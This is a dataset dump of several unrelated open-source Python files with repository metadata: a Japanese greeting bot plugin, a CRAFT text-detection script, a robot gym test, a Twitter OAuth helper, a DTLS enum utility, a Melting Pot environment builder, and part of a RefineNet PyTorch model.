['こんにちは', 'こんちわ'],
['よ', 'やぁ', 'おっす']
]
phrases = yui.config_val("greetings", default=builtin_phrases)
def getRandomExcept(arr, ex):
if not ex in arr:
return random.choice(arr)
idx = arr.index(ex)
arrEx = arr[:idx] + arr[idx + 1:]
return random.choice(arrEx)
@yui.event('msg_recv')
def greetings(msg, channel):
global phrases
answer = None
lower = msg.lower()
lower = re.sub('[!?\. ]', '', lower)
for s in phrases:
if lower in s:
yui.send_msg(channel, getRandomExcept(s, lower))
| 20.205882 | 62 | 0.576419 | 90 | 687 | 4.344444 | 0.555556 | 0.046036 | 0.092072 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003854 | 0.244541 | 687 | 33 | 63 | 20.818182 | 0.749518 | 0.017467 | 0 | 0 | 0 | 0 | 0.093611 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.08 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b6c9264337d7efc8225aa77510103ab427f4a4b | 6,392 | py | Python | pipeline.py | dotrungkien3210/CRAFT_done | 03b754c93090e2ccbf951f345547b4db0e42c77d | [
"MIT"
] | null | null | null | pipeline.py | dotrungkien3210/CRAFT_done | 03b754c93090e2ccbf951f345547b4db0e42c77d | [
"MIT"
] | null | null | null | pipeline.py | dotrungkien3210/CRAFT_done | 03b754c93090e2ccbf951f345547b4db0e42c77d | [
"MIT"
] | null | null | null | import sys
import os
import time
import argparse
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
from test import copyStateDict
from PIL import Image
import cv2
from skimage import io
import numpy as np
import craft_utils
import test
import imgproc
import file_utils
import json
import zipfile
import pandas as pd
from craft import CRAFT
from collections import OrderedDict
#from google.colab.patches import cv2_imshow
import matplotlib.pyplot as plt
def str2bool(v):
return v.lower() in ("yes", "y", "true", "t", "1")
'''
'''
#CRAFT
parser = argparse.ArgumentParser(description='CRAFT Text Detection')
parser.add_argument('--trained_model', default='weights/craft_mlt_25k.pth', type=str, help='pretrained model')
parser.add_argument('--text_threshold', default=0.7, type=float, help='text confidence threshold')
parser.add_argument('--low_text', default=0.4, type=float, help='text low-bound score')
parser.add_argument('--link_threshold', default=0.4, type=float, help='link confidence threshold')
parser.add_argument('--cpu', default=True, type=str2bool, help='Use cpu for inference')
parser.add_argument('--canvas_size', default=1280, type=int, help='image size for inference')
parser.add_argument('--mag_ratio', default=1.5, type=float, help='image magnification ratio')
parser.add_argument('--poly', default=False, action='store_true', help='enable polygon type')
parser.add_argument('--show_time', default=False, action='store_true', help='show processing time')
parser.add_argument('--test_folder', default='data', type=str, help='đường dẫn tới ảnh đầu vào')
parser.add_argument('--refine', default=True, action='store_true', help='enable link refiner')
parser.add_argument('--refiner_model', default='weights/craft_refiner_CTW1500.pth', type=str, help='pretrained refiner model')
args = parser.parse_args()
""" Lấy hết các ảnh trong floder Test """
image_list, _, _ = file_utils.get_files(args.test_folder)
image_names = []
image_paths = []
#CUSTOMISE START
start = args.test_folder
for num in range(len(image_list)):
image_names.append(os.path.relpath(image_list[num], start))
#mở folder output nếu chưa có thì tạo ra
result_folder = 'Results'
if not os.path.isdir(result_folder):
os.mkdir(result_folder)
if __name__ == '__main__':
first = pd.DataFrame(columns=['0', '1', '2', '3', '4', '5', '6', '7'])
first.to_csv('data.csv', index=False)
csv_columns = ['x_top_left', 'y_top_left', 'x_top_right', 'y_top_right', 'x_bot_right', 'y_bot_right', 'x_bot_left' , 'y_bot_left']
# load net
net = CRAFT() # initialize
print('Đang thực hiện load weight (' + args.trained_model + ')')
'''
nhảy sang file test, đưa vào train model
'''
if args.cpu:
net.load_state_dict(copyStateDict(torch.load(args.trained_model, map_location='cpu')))
else:
net.load_state_dict(copyStateDict(torch.load(args.trained_model, map_location='cpu')))
if args.cpu:
net = net.cpu()
net = torch.nn.DataParallel(net)
cudnn.benchmark = False
net.eval()
# LinkRefiner Đoạn này code không chạy qua nên không cần đọc vì weight đã load ở cái bên trên
# còn refine để mặc định bên trên là False nên sẽ bị bỏ qua
# ------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------
refine_net = None
if args.refine:
from refinenet import RefineNet
refine_net = RefineNet()
print('Đang thực hiện load weight (' + args.refiner_model + ')')
if args.cpu:
refine_net.load_state_dict(copyStateDict(torch.load(args.refiner_model, map_location='cpu')))
refine_net = refine_net.cpu()
refine_net = torch.nn.DataParallel(refine_net)
else:
refine_net.load_state_dict(copyStateDict(torch.load(args.refiner_model, map_location='cpu')))
refine_net.eval()
args.poly = True
# ------------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------------
t = time.time()
# load data
for k, image_path in enumerate(image_list):
print("Test image {:d}/{:d}: {:s}".format(k+1, len(image_list), image_path), end='\r')
#ở đây đã dùng skimage.io.imread thay vì cv2.imread
# chủ yếu đầu ra như thế sẽ làm cho ảnh định dạng với dạng RGB thay vì BGR, chỉ khác chút màu
# mục đích để load với kênh màu khác thì chưa rõ
image = imgproc.loadImage(image_path)
'''nhảy qua folder test và đọc lện tiếp
4 tham số trả về bao gồm
bbxes trả về tọa độ của từng từ một ví dụ công viên thống nhất có 4 từ
lưu ý là bbxes trả về 8 tọa độ bao gồm 4 đỉnh của hình chữ nhật
polys có vẻ giống với box nhưng mà với việc load theo weight hoặc model khác, ở đây polys đang ko cần
score_text trả về bản đồ nhiệt và đồng thời lưu bản đồ vào file kết quả
det_scores chưa rõ nhưng có vẻ là không quá quan trong'''
bboxes, polys, score_text, det_scores = test.test_net(net, image, args.text_threshold, args.link_threshold, args.low_text, args.cpu, args.poly, args, refine_net)
bbox_score={}
for box_num in range(len(bboxes)):
item = bboxes[box_num]
data = np.array([[int(item[0][0]),int(item[0][1]),int(item[1][0]),int(item[1][1]),int(item[2][0]),int(item[2][1]),int(item[3][0]),int(item[3][1])]])
csvdata = pd.DataFrame(data, columns=csv_columns)
csvdata.to_csv('data.csv',index=False,mode='a', header=False)
'''
như vậy là đã phát hiện chữ cái và tọa độ 4 đỉnh của hình chữ nhật
từ đây ta có thể để dàng tính đượng width height nếu cần
việc tiếp theo là tìm kiếm label ta sẽ tìm ở repo deep-text
'''
# save score text
filename, file_ext = os.path.splitext(os.path.basename(image_path))
mask_file = result_folder + "/res_" + filename + '_mask.jpg'#tạo đường dẫn file bản đồ nhiệt
cv2.imwrite(mask_file, score_text)# in ra bản đồ nhiệt
file_utils.saveResult(image_path, image[:,:,::-1], polys, dirname=result_folder)
print("elapsed time : {}s".format(time.time() - t)) | 42.613333 | 169 | 0.644399 | 941 | 6,392 | 4.239107 | 0.339001 | 0.027074 | 0.051141 | 0.016044 | 0.190775 | 0.138381 | 0.091251 | 0.075708 | 0.075708 | 0.075708 | 0 | 0.010742 | 0.184449 | 6,392 | 150 | 170 | 42.613333 | 0.75446 | 0.140801 | 0 | 0.097826 | 0 | 0 | 0.166702 | 0.012428 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01087 | false | 0 | 0.26087 | 0.01087 | 0.282609 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b6e212a217152d50fa2b17ef97b1f59c657aa2c | 683 | py | Python | sawyer/ros/tests/test_gym_env.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | sawyer/ros/tests/test_gym_env.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | sawyer/ros/tests/test_gym_env.py | rlagywjd802/gym-sawyer | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | [
"MIT"
] | null | null | null | import rospy
import numpy as np
from sawyer.ros.envs.sawyer import ToyEnv
rospy.init_node('test_gym_env')
toy_env = ToyEnv(simulated=False, control_mode='task_space')
actions = []
x = np.array([0.1, 0, 0, 1])
y = np.array([0, 0.1, 0, 1])
z = np.array([0, 0, -0.07, 1])
z_ = np.array([0, 0, +1.0, -1])
g1 = np.array([0, 0, 0, -1])
g2 = np.array([0, 0, 0, 1])
actions.append(g2)
actions.append(x)
actions.append(y)
#actions.append(z)
#actions.append(g1)
#actions.append(z_)
i = 0
while i < 3:
obs, r, done, info = toy_env.step(actions[i])
print("==============", i, "==============")
print(obs)
#print(r)
print(done)
#print(info)
i += 1
#toy_env.reset() | 21.34375 | 60 | 0.58858 | 122 | 683 | 3.213115 | 0.352459 | 0.045918 | 0.122449 | 0.114796 | 0.15051 | 0.147959 | 0.061224 | 0 | 0 | 0 | 0 | 0.06338 | 0.168375 | 683 | 32 | 61 | 21.34375 | 0.626761 | 0.127379 | 0 | 0 | 0 | 0 | 0.084602 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.136364 | 0 | 0.136364 | 0.136364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b6fb84ee71db7efee09629b7534739a828aefb3 | 1,045 | py | Python | docker/features/libs/authhandler/oauth_handler.py | krdpk17/twitter-neo4j | bb7e62743651082726db373d118dcc90cce48532 | [
"Apache-2.0"
] | 1 | 2020-04-30T07:09:43.000Z | 2020-04-30T07:09:43.000Z | docker/features/libs/authhandler/oauth_handler.py | krdpk17/twitter-neo4j | bb7e62743651082726db373d118dcc90cce48532 | [
"Apache-2.0"
] | null | null | null | docker/features/libs/authhandler/oauth_handler.py | krdpk17/twitter-neo4j | bb7e62743651082726db373d118dcc90cce48532 | [
"Apache-2.0"
] | 1 | 2020-05-14T22:33:31.000Z | 2020-05-14T22:33:31.000Z | '''
Built-in modules
'''
import pdb
import oauth2 as oauth
import os
import json
'''
User defined modules
'''
from libs.twitter_logging import logger
print("Using oauth")
# Global variables
# Twitter key/secret as a result of registering application
TWITTER_CONSUMER_KEY = os.environ["TWITTER_CONSUMER_KEY"]
TWITTER_CONSUMER_SECRET = os.environ["TWITTER_CONSUMER_SECRET"]
# Twitter token key/secret from individual user oauth
TWITTER_USER_KEY = os.environ["TWITTER_USER_KEY"]
TWITTER_USER_SECRET = os.environ["TWITTER_USER_SECRET"]
def make_api_request(url, method='GET', headers={}):
try:
token = oauth.Token(key=TWITTER_USER_KEY, secret=TWITTER_USER_SECRET)
consumer = oauth.Consumer(key=TWITTER_CONSUMER_KEY, secret=TWITTER_CONSUMER_SECRET)
client = oauth.Client(consumer, token)
response, content = client.request(url, method, headers=headers)
return response, json.loads(content)
except Exception as e:
logger.error("Error {} while {} API with {} method".format(e, url, method))
raise
| 29.857143 | 89 | 0.751196 | 141 | 1,045 | 5.375887 | 0.382979 | 0.118734 | 0.084433 | 0.050132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001121 | 0.146411 | 1,045 | 34 | 90 | 30.735294 | 0.848655 | 0.137799 | 0 | 0 | 0 | 0 | 0.14832 | 0.026651 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.25 | 0 | 0.35 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b707985d6d3837a66930e043d098597e8582439 | 1,500 | py | Python | src/aio_dtls/connection_manager/enum_props.py | businka/aio_dtls | 0dba40d425b443e5ceb516011aadf58f573a4dc8 | [
"MIT"
] | null | null | null | src/aio_dtls/connection_manager/enum_props.py | businka/aio_dtls | 0dba40d425b443e5ceb516011aadf58f573a4dc8 | [
"MIT"
] | null | null | null | src/aio_dtls/connection_manager/enum_props.py | businka/aio_dtls | 0dba40d425b443e5ceb516011aadf58f573a4dc8 | [
"MIT"
] | null | null | null | import logging
from enum import Enum
from typing import List, Tuple
logger = logging.getLogger(__name__)
class Default(Enum):
pass
class EnumProps:
supported = []
EnumClass = Default
def __init__(self, wish_list=None):
self._available: List[Tuple[str, int]] = self._init_from_list(wish_list)
pass
@property
def available(self):
return [item[1] for item in self._available]
@property
def default(self):
return self.EnumClass[self.supported[0]]
@property
def available_values(self):
return [hash(item[1]) for item in self._available]
def _init_from_list(self, wish_list):
_result = []
if wish_list is None:
wish_list = self.supported
for elem in wish_list:
try:
prop = self.EnumClass[elem]
_result.append((prop.name, prop.value))
except KeyError:
logger.warning(f'{self.__class__.__name__} not supported {elem}')
_result = sorted(_result, key=lambda x: hash(x[1]), reverse=True)
return _result
def get_best(self, client_offer: list):
_client_offer = [str(item) for item in client_offer]
logger.debug(f'{self.__class__.__name__} selecting from {_client_offer}')
for elem in self._available:
if elem[0] in client_offer:
logger.debug(f'{self.__class__.__name__} selected {elem[0]}')
return self.EnumClass[elem[0]]
| 28.846154 | 81 | 0.623333 | 187 | 1,500 | 4.668449 | 0.315508 | 0.054983 | 0.030928 | 0.04811 | 0.148912 | 0.148912 | 0.148912 | 0.087056 | 0.087056 | 0 | 0 | 0.006446 | 0.276 | 1,500 | 51 | 82 | 29.411765 | 0.797422 | 0 | 0 | 0.125 | 0 | 0 | 0.097333 | 0.05 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0.05 | 0.075 | 0.075 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b7145fb178bd8bd0a1a4f13cb1dc9f132d5a8d6 | 7,585 | py | Python | meltingpot/python/utils/substrates/builder.py | LaudateCorpus1/meltingpot | e42b916b32771f7af5ad4eccbdf4ded410735299 | [
"Apache-2.0"
] | 132 | 2021-07-16T14:15:07.000Z | 2022-03-31T21:29:19.000Z | meltingpot/python/utils/substrates/builder.py | vishalbelsare/meltingpot | f36ed3aab6414acee0720721b053322bf41a75d4 | [
"Apache-2.0"
] | 21 | 2021-07-22T17:37:22.000Z | 2022-03-16T02:59:37.000Z | meltingpot/python/utils/substrates/builder.py | LaudateCorpus1/meltingpot | e42b916b32771f7af5ad4eccbdf4ded410735299 | [
"Apache-2.0"
] | 19 | 2021-07-17T17:15:05.000Z | 2022-03-22T17:28:54.000Z | # Copyright 2020 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Multi-player environment builder for Melting Pot levels."""
import copy
import itertools
import os
import pathlib # pylint: disable=unused-import
import random
from typing import Any, Dict, Optional, Union
from absl import logging
from ml_collections import config_dict
import tree
import dmlab2d
from dmlab2d import runfiles_helper
from dmlab2d import settings_helper
from meltingpot.python.utils.substrates import game_object_utils
from meltingpot.python.utils.substrates.wrappers import reset_wrapper
Settings = Union[config_dict.ConfigDict, Dict[str, Any]]
Prefabs = Dict[str, Settings]
_MAX_SEED = 2 ** 32 - 1
_DMLAB2D_ROOT = runfiles_helper.find()
_MELTINGPOT_ROOT = str(pathlib.Path(__file__).parent.parent.parent.parent.parent)
# Although to_dict in ConfigDict is recursive, it is not enough for our use case
# because the recursion will _not_ go into the list elements. And we have plenty
# of those in our configs.
def _config_dict_to_dict(value):
if isinstance(value, config_dict.ConfigDict):
return tree.map_structure(_config_dict_to_dict, value.to_dict())
return value
def parse_python_settings_for_dmlab2d(
lab2d_settings: config_dict.ConfigDict) -> Settings:
"""Flatten lab2d_settings into Lua-friendly properties."""
# Since config_dicts disallow "." in keys, we must use a different character,
# "$", in our config and then convert it to "." here. This is particularly
# important for levels with config keys like 'player.%default' in DMLab2D.
lab2d_settings = _config_dict_to_dict(lab2d_settings)
lab2d_settings = settings_helper.flatten_args(lab2d_settings)
lab2d_settings_dict = {}
for key, value in lab2d_settings.items():
converted_key = key.replace("$", ".")
lab2d_settings_dict[converted_key] = str(value)
return lab2d_settings_dict
def apply_prefab_overrides(
lab2d_settings: config_dict.ConfigDict,
prefab_overrides: Optional[Settings] = None):
"""Apply prefab overrides to lab2d_settings."""
if "gameObjects" not in lab2d_settings.simulation:
lab2d_settings.simulation.gameObjects = []
# Edit prefabs with the overrides, both in lab2d_settings and in prefabs.
if prefab_overrides:
for prefab, override in prefab_overrides.items():
for component, arg_overrides in override.items():
for arg_name, arg_override in arg_overrides.items():
if prefab not in lab2d_settings.simulation.prefabs:
raise ValueError(f"Prefab override for '{prefab}' given, but not " +
"available in `prefabs`.")
game_object_utils.get_first_named_component(
lab2d_settings.simulation.prefabs[prefab],
component)["kwargs"][arg_name] = arg_override
def maybe_build_and_add_avatar_objects(lab2d_settings: config_dict.ConfigDict):
"""If requested, build the avatar objects and add them to lab2d_settings.
Avatars will be built here if and only if:
1) An 'avatar' prefab is supplied in lab2d_settings.simulation.prefabs; and
2) lab2d_settings.simulation.buildAvatars is not True.
Avatars built here will have their colors set from the palette provided in
lab2d_settings.simulation.playerPalettes, or if none is provided, using the
first num_players colors in the colors.py module.
Args:
lab2d_settings: A writable version of the lab2d_settings. Avatar objects,
if they are to be built here, will be added as game objects in
lab2d_settings.simulation.gameObjects.
"""
# Whether the avatars will be built in Lua (False) or here (True). This is
# roughly the opposite of the `buildAvatars` setting.
build_avatars_here = ("avatar" in lab2d_settings.simulation.prefabs)
if ("buildAvatars" in lab2d_settings.simulation
and lab2d_settings.simulation.buildAvatars):
build_avatars_here = False
if "avatar" not in lab2d_settings.simulation.prefabs:
raise ValueError(
"Deferring avatar building to Lua, yet no 'avatar' prefab given.")
if build_avatars_here:
palettes = (lab2d_settings.simulation.playerPalettes
if "playerPalettes" in lab2d_settings.simulation else None)
if "gameObjects" not in lab2d_settings.simulation:
lab2d_settings.simulation.gameObjects = []
# Create avatars.
logging.info("Building avatars in `meltingpot.builder` with palettes: %s",
lab2d_settings.simulation.playerPalettes)
avatar_objects = game_object_utils.build_avatar_objects(
int(lab2d_settings.numPlayers),
lab2d_settings.simulation.prefabs,
palettes)
lab2d_settings.simulation.gameObjects += avatar_objects
def locate_and_overwrite_level_directory(
lab2d_settings: config_dict.ConfigDict):
"""Locates the run files, and overwrites the levelDirectory with it."""
# Locate runfiles.
level_name = lab2d_settings.get("levelName")
level_dir = lab2d_settings.get("levelDirectory")
if level_dir:
lab2d_settings.levelName = os.path.join(level_dir, level_name)
lab2d_settings.levelDirectory = _MELTINGPOT_ROOT
def builder(
lab2d_settings: Settings,
prefab_overrides: Optional[Settings] = None,
env_seed: Optional[int] = None,
**settings) -> dmlab2d.Environment:
"""Builds a Melting Pot environment.
Args:
lab2d_settings: a dict of environment designation args.
prefab_overrides: overrides for prefabs.
env_seed: the seed to pass to the environment.
**settings: Other settings which are not used by Melting Pot but can still
be passed from the environment builder.
Returns:
A multi-player Melting Pot environment.
"""
del settings # Not currently used by DMLab2D.
assert "simulation" in lab2d_settings
# Copy config, so as not to modify it.
lab2d_settings = config_dict.ConfigDict(
copy.deepcopy(lab2d_settings)).unlock()
apply_prefab_overrides(lab2d_settings, prefab_overrides)
maybe_build_and_add_avatar_objects(lab2d_settings)
locate_and_overwrite_level_directory(lab2d_settings)
# Convert settings from python to Lua format.
lab2d_settings_dict = parse_python_settings_for_dmlab2d(lab2d_settings)
# Only the raw environment has the properties API.
env_raw = dmlab2d.Lab2d(_DMLAB2D_ROOT, lab2d_settings_dict)
observation_names = env_raw.observation_names()
logging.info("available observation names: %s", observation_names)
if env_seed is None:
# Select a long seed different than zero.
env_seed = random.randint(1, _MAX_SEED)
env_seeds = (seed % (_MAX_SEED + 1) for seed in itertools.count(env_seed))
def build_environment():
seed = next(env_seeds)
lab2d_settings_dict["env_seed"] = str(seed) # Sets the Lua seed.
env_raw = dmlab2d.Lab2d(runfiles_helper.find(), lab2d_settings_dict)
return dmlab2d.Environment(
env=env_raw,
observation_names=observation_names,
seed=seed)
# Add a wrapper that rebuilds the environment when reset is called.
env = reset_wrapper.ResetWrapper(build_environment)
return env
| 39.505208 | 81 | 0.753724 | 1,021 | 7,585 | 5.400588 | 0.27522 | 0.12967 | 0.079253 | 0.045339 | 0.174646 | 0.092129 | 0.092129 | 0.060573 | 0.027203 | 0.027203 | 0 | 0.013694 | 0.17205 | 7,585 | 191 | 82 | 39.712042 | 0.864331 | 0.361767 | 0 | 0.038835 | 0 | 0 | 0.069664 | 0 | 0 | 0 | 0 | 0 | 0.009709 | 1 | 0.067961 | false | 0 | 0.135922 | 0 | 0.252427 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b74a70df1f3528c0e00a84d2d1ae7d6f95e52e3 | 20,333 | py | Python | models/resnet.py | egvincent/rgbd-sem-seg | 054890ace318a883aac0ad1bfa3d2383939a6892 | [
"BSD-2-Clause"
] | 1 | 2021-07-08T12:01:18.000Z | 2021-07-08T12:01:18.000Z | models/resnet.py | egvincent/rgbd-sem-seg | 054890ace318a883aac0ad1bfa3d2383939a6892 | [
"BSD-2-Clause"
] | 5 | 2021-03-19T00:34:34.000Z | 2022-03-11T23:47:16.000Z | models/resnet.py | egvincent/rgbd-sem-seg | 054890ace318a883aac0ad1bfa3d2383939a6892 | [
"BSD-2-Clause"
] | 1 | 2021-07-08T12:01:20.000Z | 2021-07-08T12:01:20.000Z | """RefineNet-LightWeight
RefineNet-LigthWeight PyTorch for non-commercial purposes
Copyright (c) 2018, Vladimir Nekrasov (vladimir.nekrasov@adelaide.edu.au)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import torch.nn as nn
import torch.nn.functional as F
import torch
import numpy as np
from utils.helpers import maybe_download
from utils.layer_factory import conv1x1, conv3x3, CRPBlock
data_info = {
7 : 'Person',
21: 'VOC',
40: 'NYU',
60: 'Context'
}
models_urls = {
'50_person' : 'https://cloudstor.aarnet.edu.au/plus/s/mLA7NxVSPjNL7Oo/download',
'101_person' : 'https://cloudstor.aarnet.edu.au/plus/s/f1tGGpwdCnYS3xu/download',
'152_person' : 'https://cloudstor.aarnet.edu.au/plus/s/Ql64rWqiTvWGAA0/download',
'50_voc' : 'https://cloudstor.aarnet.edu.au/plus/s/2E1KrdF2Rfc5khB/download',
'101_voc' : 'https://cloudstor.aarnet.edu.au/plus/s/CPRKWiaCIDRdOwF/download',
'152_voc' : 'https://cloudstor.aarnet.edu.au/plus/s/2w8bFOd45JtPqbD/download',
'50_nyu' : 'https://cloudstor.aarnet.edu.au/plus/s/gE8dnQmHr9svpfu/download',
'101_nyu' : 'https://cloudstor.aarnet.edu.au/plus/s/VnsaSUHNZkuIqeB/download',
'152_nyu' : 'https://cloudstor.aarnet.edu.au/plus/s/EkPQzB2KtrrDnKf/download',
'101_context': 'https://cloudstor.aarnet.edu.au/plus/s/hqmplxWOBbOYYjN/download',
'152_context': 'https://cloudstor.aarnet.edu.au/plus/s/O84NszlYlsu00fW/download',
'50_imagenet' : 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'101_imagenet': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'152_imagenet': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
stages_suffixes = {0 : '_conv',
1 : '_conv_relu_varout_dimred'}
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
### This class was made to abstract the RefineNet code from the original
### ResNet (originally ResNetLW) module into its own module. Further, I have
### made the following modifications to convert from LW-RefineNet to RefineNet:
### - conv1x1 changed to conv3x3 in all lines ending in _varout_dimred,
### which are part of the multi-resolution fusion blocks
### - RCU blocks added
### - heavy reorganization, renaming, etc
### I would like to rename the blocks in this module but I think the names are important for
### other parts of the code
class RefineNet(nn.Module):
# inplanes_hr/lr are the number of channels of the high resolution input and
# low resolution input respectively. if inplanes_hr is omitted, no fusion takes
# place: this is useful for layer 4 in our case, to prep for fusing it with layer 3.
# the inputs will be passed through:
# - if HR is provided: 2 RCU blocks for HR only
# otherwise, 2 RCU blocks for LR only
# - fusion of HR and LR (if HR is provided)
# - CRP block + 1 RCU block for result of fusion (or LR if no HR provided)
def __init__(self, inplanes_lr, inplanes_hr=None, fancy_upsample=False):
super(RefineNet, self).__init__()
self.fancy_upsample = fancy_upsample
# first set of RCU blocks
if inplanes_hr == None:
self.inplanes = inplanes_lr
self.rcu1_lr = self._make_layer(BasicBlock, planes=inplanes_lr, blocks=2)
else:
self.inplanes = inplanes_hr
self.rcu1_hr = self._make_layer(BasicBlock, planes=inplanes_hr, blocks=2)
# fusion
if inplanes_hr != None:
self.adapt_stage2_b2_joint_varout_dimred = conv3x3(inplanes_hr, inplanes_hr, bias=False)
self.mflow_conv_g1_b3_joint_varout_dimred = conv3x3(inplanes_lr, inplanes_hr, bias=False)
if fancy_upsample:
# learnable upsample with a single (strided) transpose convolution (for now)
self.upsample = nn.ConvTranspose2d(inplanes_hr, inplanes_hr, kernel_size=3, stride=2, padding=1)
#self.upsample = nn.ConvTranspose2d(inplanes_hr, inplanes_hr, kernel_size=5, stride=2, padding=2)
# CRP and RCU for fusion result
outplanes = inplanes_hr if inplanes_hr != None else inplanes_lr
self.mflow_conv_g1_pool = self._make_crp(outplanes, outplanes, 4)
self.inplanes = outplanes
self.rcu2 = self._make_layer(BasicBlock, planes=outplanes, blocks=1)
# _make_layer and _make_crp copied from the ResNetLW class
def _make_crp(self, in_planes, out_planes, stages):
layers = [CRPBlock(in_planes, out_planes,stages)]
return nn.Sequential(*layers)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
